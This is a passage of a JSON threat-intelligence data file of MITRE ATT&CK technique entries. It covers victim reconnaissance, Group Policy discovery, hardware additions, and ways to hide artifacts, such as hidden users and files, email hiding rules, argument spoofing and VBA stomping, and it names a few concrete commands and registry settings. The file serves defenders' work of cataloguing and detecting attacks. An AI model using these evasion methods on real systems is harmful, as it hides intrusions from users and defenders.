Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf))",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1591.003"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "1f28a8a5-7231-47ad-9943-73b3cc6d05b0",
"value": "Identify Business Tempo"
},
{
"description": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1591.004"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "63a99eb9-0da7-4286-bfc9-c306a03abf24",
"value": "Identify Roles"
},
{
"description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup><sup>[[SEC EDGAR Search](https://app.tidalcyber.com/references/97958143-80c5-41f6-9fa6-4748e90e9f12)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
},
{
"dest-uuid": "9bd53629-fa2c-417d-b937-c575504be5b1",
"type": "similar"
},
{
"dest-uuid": "d93b51df-014a-4d46-949a-4b8f796e6cca",
"type": "similar"
},
{
"dest-uuid": "1f28a8a5-7231-47ad-9943-73b3cc6d05b0",
"type": "similar"
},
{
"dest-uuid": "63a99eb9-0da7-4286-bfc9-c306a03abf24",
"type": "similar"
}
],
"uuid": "e55d2e4b-07d8-4c22-b543-c187be320578",
"value": "Gather Victim Org Information"
},
{
"description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.<sup>[[TechNet Group Policy Basics](https://app.tidalcyber.com/references/9b9c8c6c-c272-424e-a594-a34b7bf62477)]</sup><sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup>\n\nAdversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.<sup>[[Microsoft gpresult](https://app.tidalcyber.com/references/88af38e8-e437-4153-80af-a1be8c6a8629)]</sup><sup>[[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)]</sup> Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://app.tidalcyber.com/technique/d092a9e1-63d0-415d-8cd0-666a261be5d9)) for their benefit.",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "d97d754d-92d5-4874-bbfe-5aa4d581f2a8",
"value": "Group Policy Discovery"
},
{
"description": "Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.\n\nWhile public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.<sup>[[Ossmann Star Feb 2011](https://app.tidalcyber.com/references/1be27354-1326-4568-b26a-d0034acecba2)]</sup><sup>[[Aleks Weapons Nov 2015](https://app.tidalcyber.com/references/fd22c941-b0dc-4420-b363-2f5777981041)]</sup><sup>[[Frisk DMA August 2016](https://app.tidalcyber.com/references/c504485b-2daa-4159-96da-481a0b97a979)]</sup><sup>[[McMillan Pwn March 2012](https://app.tidalcyber.com/references/6b57e883-75a1-4a71-accc-2d18148b9c3d)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "4557bfb9-b940-49b6-b8be-571979134419",
"value": "Hardware Additions"
},
{
"description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets on Windows systems.<sup>[[Microsoft Inbox Rules](https://app.tidalcyber.com/references/91ce21f7-4cd5-4a75-a533-45d052a11c5d)]</sup><sup>[[MacOS Email Rules](https://app.tidalcyber.com/references/f83283aa-3aaf-4ebd-8503-0d84c2c627c4)]</sup><sup>[[Microsoft New-InboxRule](https://app.tidalcyber.com/references/54fcfc36-e0d5-422f-8a45-eeb7fa077a93)]</sup><sup>[[Microsoft Set-InboxRule](https://app.tidalcyber.com/references/28cc6142-cc4f-4e63-bcff-94347bc06b37)]</sup>\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines. <sup>[[Microsoft Cloud App Security](https://app.tidalcyber.com/references/be0a1168-fa84-4742-a658-41a078b7f5fa)]</sup>\n\nIn some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.<sup>[[Microsoft Mail Flow Rules 2023](https://app.tidalcyber.com/references/421093d7-6ac8-5ebc-9a04-1c65bdce0980)]</sup> Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.008"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "01505d46-8675-408d-881e-68f4d8743d47",
"value": "Email Hiding Rules"
},
{
"description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a hidden file. These files dont show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls a</code> for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name <sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup> <sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>. Files and folders that start with a period, ., are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app <sup>[[WireLurker](https://app.tidalcyber.com/references/fd33f71b-767d-4312-a8c9-5446939bb5ae)]</sup>. On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesnt clutter up the users workspace. For example, SSH utilities create a .ssh folder thats hidden and contains the users known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "14e81a2d-9eca-429c-9fb9-08e109de9f6c",
"value": "Hidden Files and Directories"
},
{
"description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.<sup>[[MalwareTech VFS Nov 2014](https://app.tidalcyber.com/references/c06af73d-5ed0-46a0-a5a9-161035075884)]</sup>\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.<sup>[[MalwareTech VFS Nov 2014](https://app.tidalcyber.com/references/c06af73d-5ed0-46a0-a5a9-161035075884)]</sup><sup>[[FireEye Bootkits](https://app.tidalcyber.com/references/585827a8-1f03-439d-b66e-ad5290117c1b)]</sup> Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.<sup>[[ESET ComRAT May 2020](https://app.tidalcyber.com/references/cd9043b8-4d14-449b-a6b2-2e9b99103bb0)]</sup> Adversaries may also fragment files across the existing file system structure in non-standard ways.<sup>[[Kaspersky Equation QA](https://app.tidalcyber.com/references/34674802-fbd9-4cdb-8611-c58665c430e5)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.005"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "9e6268a5-a979-4219-b0ad-76094a9876c7",
"value": "Hidden File System"
},
{
"description": "Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. \n\nIn macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value <code>Hide500Users</code> to <code>TRUE</code> in the <code>/Library/Preferences/com.apple.loginwindow</code> plist file.<sup>[[Cybereason OSX Pirrit](https://app.tidalcyber.com/references/ebdf09ed-6eec-450f-aaea-067504ec25ca)]</sup> Every user has a userID associated with it. When the <code>Hide500Users</code> key value is set to <code>TRUE</code>, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the <code>dscl</code> utility to create hidden user accounts by setting the <code>IsHidden</code> attribute to <code>1</code>. Adversaries can also hide a users home folder by changing the <code>chflags</code> to hidden.<sup>[[Apple Support Hide a User Account](https://app.tidalcyber.com/references/e901df3b-76a6-41a5-9083-b28065e75aa2)]</sup> \n\nAdversaries may similarly hide user accounts in Windows. Adversaries can set the <code>HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList</code> Registry key value to <code>0</code> for a specific user to prevent that user from being listed on the logon screen.<sup>[[FireEye SMOKEDHAM June 2021](https://app.tidalcyber.com/references/a81ad3ef-fd96-432c-a7c8-ccc86d127a1b)]</sup><sup>[[US-CERT TA18-074A](https://app.tidalcyber.com/references/94e87a92-bf80-43e2-a3ab-cd7d4895f2fc)]</sup>\n\nOn Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the <code>gsettings</code> command (ex: <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).<sup>[[Hide GDM User Accounts](https://app.tidalcyber.com/references/88c3c460-3792-4881-ae7d-031c8901610d)]</sup> Display Managers are not anchored to specific distributions and may be changed by a user or adversary.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "487916b2-99f6-40cd-8529-5a81d2f199db",
"value": "Hidden Users"
},
{
"description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nOn Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), Jscript, and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. <sup>[[PowerShell About 2019](https://app.tidalcyber.com/references/2c504602-4f5d-47fc-9780-e1e5041a0b3a)]</sup>\n\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.<sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.003"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd",
"value": "Hidden Window"
},
{
"description": "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.<sup>[[Linux Signal Man](https://app.tidalcyber.com/references/63483956-fa3e-52da-a834-b3b762c4e84e)]</sup> These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. \n\nAdversaries may invoke processes using `nohup`, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.<sup>[[nohup Linux Man](https://app.tidalcyber.com/references/f61dde91-3518-5a74-8eb8-bb3bae43e8fb)]</sup><sup>[[Microsoft PowerShell SilentlyContinue](https://app.tidalcyber.com/references/ece52a64-1c8d-547d-aedc-ff43d7418cd2)]</sup> This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\n\nHiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://app.tidalcyber.com/technique/82c07e34-9f67-4f4e-a513-c22a17b508e5) this does not establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) since the process will not be re-invoked once actually terminated.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.011"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "9e55bc80-a187-58f7-a687-d37bbd618db7",
"value": "Ignore Process Interrupts"
},
{
"description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. <sup>[[SpectorOps Host-Based Jul 2017](https://app.tidalcyber.com/references/5fbf3a1d-eac2-44b8-a0a9-70feca168647)]</sup> Within MFT entries are file attributes, <sup>[[Microsoft NTFS File Attributes Aug 2010](https://app.tidalcyber.com/references/dc4689d2-54b4-4310-ac10-6b234eedbc16)]</sup> such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). <sup>[[SpectorOps Host-Based Jul 2017](https://app.tidalcyber.com/references/5fbf3a1d-eac2-44b8-a0a9-70feca168647)]</sup> <sup>[[Microsoft File Streams](https://app.tidalcyber.com/references/ef3f58da-e735-4b1d-914c-fafabb7439bf)]</sup> <sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup> <sup>[[Microsoft ADS Mar 2014](https://app.tidalcyber.com/references/eae434ff-97c0-4a82-9f80-215e515befae)]</sup>\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. <sup>[[Journey into IR ZeroAccess NTFS EA](https://app.tidalcyber.com/references/e9dff187-fe7d-469d-81cb-30ad520dbd3d)]</sup> <sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.004"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "3b12e647-2bbd-4d84-9abe-401ad4230b6d",
"value": "NTFS File Attributes"
},
{
"description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.<sup>[[Microsoft PEB 2021](https://app.tidalcyber.com/references/e0ec4cf6-1e6a-41ab-8704-a66c5cc4d226)]</sup><sup>[[Xpn Argue Like Cobalt 2019](https://app.tidalcyber.com/references/724464f6-1a86-46e3-9a81-192b136c73ba)]</sup>\n\nAdversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) <code>WriteProcessMemory()</code> function) then resume process execution with malicious arguments.<sup>[[Cobalt Strike Arguments 2019](https://app.tidalcyber.com/references/e845f741-eabe-469b-97c1-f51a2aeb18b0)]</sup><sup>[[Xpn Argue Like Cobalt 2019](https://app.tidalcyber.com/references/724464f6-1a86-46e3-9a81-192b136c73ba)]</sup><sup>[[Nviso Spoof Command Line 2020](https://app.tidalcyber.com/references/a3fa92ed-763c-4082-8220-cab82d70fad4)]</sup>\n\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.<sup>[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]</sup>\n\nThis behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://app.tidalcyber.com/technique/449abc18-9faf-4ea6-a420-34528c28301d)) to manipulate or further evade process-based detections.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.010"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f5732b2d-0548-4574-bcc8-59ceef24aeeb",
"value": "Process Argument Spoofing"
},
{
"description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.<sup>[[macOS Hierarchical File System Overview](https://app.tidalcyber.com/references/4b8b110a-fc40-4094-a70d-15530bc05fec)]</sup> Usage of a resource fork is identifiable when displaying a files extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.<sup>[[Resource and Data Forks](https://app.tidalcyber.com/references/b8eaf053-40e0-414e-a89e-409dbf218554)]</sup><sup>[[ELC Extended Attributes](https://app.tidalcyber.com/references/e62d67ed-48d0-4141-aacc-92e165d66f16)]</sup>\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.<sup>[[sentinellabs resource named fork 2020](https://app.tidalcyber.com/references/0008dfd8-25a1-4e6a-9154-da7bcbb7daa7)]</sup><sup>[[tau bundlore erika noerenberg 2020](https://app.tidalcyber.com/references/1c62ed57-43f7-40d7-a5c9-46b40a40af0e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.009"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "644d820e-6f64-4404-a861-cfa8b18b42a6",
"value": "Resource Forking"
},
{
"description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.<sup>[[SingHealth Breach Jan 2019](https://app.tidalcyber.com/references/d1f699e3-7c9d-4a95-ad58-f46e665a4d37)]</sup>\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.<sup>[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.006"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "7564b45e-55d9-4ffa-8e08-b08b0aa82182",
"value": "Run Virtual Instance"
},
{
"description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.<sup>[[FireEye VBA stomp Feb 2020](https://app.tidalcyber.com/references/bd034cc8-29e2-4d58-a72a-161b831191b7)]</sup>\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a <code>PerformanceCache</code> that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the <code>_VBA_PROJECT</code> stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.<sup>[[Evil Clippy May 2019](https://app.tidalcyber.com/references/aafa27e8-5df7-4fc6-9fe5-9a438f2b507a)]</sup><sup>[[Microsoft _VBA_PROJECT Stream](https://app.tidalcyber.com/references/70c75ee4-4ba4-4124-8001-0fadb49a5ac6)]</sup>\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zeros, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the <code>_VBA_PROJECT</code> stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.<sup>[[Walmart Roberts Oct 2018](https://app.tidalcyber.com/references/d1c88a57-85f4-4a35-a7fa-35e8c7fcd943)]</sup><sup>[[FireEye VBA stomp Feb 2020](https://app.tidalcyber.com/references/bd034cc8-29e2-4d58-a72a-161b831191b7)]</sup><sup>[[pcodedmp Bontchev](https://app.tidalcyber.com/references/3057d857-6984-4247-918b-952b75ee152e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1564.007"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "1e3d9e0a-6744-44e4-836d-1db38a4cc99c",
"value": "VBA Stomping"
},
{
"description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.<sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[Cybereason OSX Pirrit](https://app.tidalcyber.com/references/ebdf09ed-6eec-450f-aaea-067504ec25ca)]</sup><sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup>\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.<sup>[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Office 365",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "01505d46-8675-408d-881e-68f4d8743d47",
"type": "similar"
},
{
"dest-uuid": "14e81a2d-9eca-429c-9fb9-08e109de9f6c",
"type": "similar"
},
{
"dest-uuid": "9e6268a5-a979-4219-b0ad-76094a9876c7",
"type": "similar"
},
{
"dest-uuid": "487916b2-99f6-40cd-8529-5a81d2f199db",
"type": "similar"
},
{
"dest-uuid": "5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd",
"type": "similar"
},
{
"dest-uuid": "9e55bc80-a187-58f7-a687-d37bbd618db7",
"type": "similar"
},
{
"dest-uuid": "3b12e647-2bbd-4d84-9abe-401ad4230b6d",
"type": "similar"
},
{
"dest-uuid": "f5732b2d-0548-4574-bcc8-59ceef24aeeb",
"type": "similar"
},
{
"dest-uuid": "644d820e-6f64-4404-a861-cfa8b18b42a6",
"type": "similar"
},
{
"dest-uuid": "7564b45e-55d9-4ffa-8e08-b08b0aa82182",
"type": "similar"
},
{
"dest-uuid": "1e3d9e0a-6744-44e4-836d-1db38a4cc99c",
"type": "similar"
}
],
"uuid": "f37f0cd5-0446-415f-9309-94e25aa1165d",
"value": "Hide Artifacts"
},
{
